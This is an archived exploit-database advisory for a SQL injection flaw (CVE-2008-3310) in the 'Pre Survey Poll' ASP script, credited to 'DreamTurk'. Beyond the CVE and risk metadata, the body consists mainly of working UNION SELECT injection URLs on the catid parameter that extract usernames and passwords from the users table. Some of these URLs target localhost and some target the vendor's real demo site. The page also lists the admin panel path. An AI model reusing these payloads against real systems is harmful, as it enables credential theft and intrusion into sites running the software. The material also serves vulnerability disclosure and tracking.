Bug: Pre Survey Poll (default.asp catid) SQL Injection Vulnerability (WLB-2008070134 Ascii Version)

English Version
WLB2

CVE WLB2

 Topic: Pre Survey Poll (default.asp catid) SQL Injection Vulnerability
 Credit: DreamTurk
 Date: 2008.07.28
 CWE: Not in CWE (Show similar)
 CVE: CVE-2008-3310 (Show details)

Use CVE to see details like:
- CVSS2,
- Affected Software,
- References

Risk
Local
Remote
Medium
No
Yes

PRE SURVEY POLL Remote Sql Injection
DreamTurk / sqL Lov3r'Z Crew Co. 2008
Downlod: http://www.preproject.com/poll.asp / Price $28.00
Demo : http://www.preproject.com/poll/default.asp
Sql :
http://localhost/patch/default.asp?catid=1+union+select+0,username+from+users
http://localhost/patch/default.asp?catid=1+union+select+0,username+from+users

Admin Panel :
http://localhost/patch/admin/default.asp
Greatz : aLL My Friend'Z and str0ke

========================================From Turkey=============================================
Demo Page ;
http://www.preproject.com/poll/default.asp?catid=1+union+select+0,password+from+users

http://www.preproject.com/poll/default.asp?catid=1+union+select+0,password+from+users

References:

http://www.milw0rm.com/exploits/6119
http://secunia.com/advisories/31187

[ ASCII VERSION ]

Copyright 2012, cxsecurity.com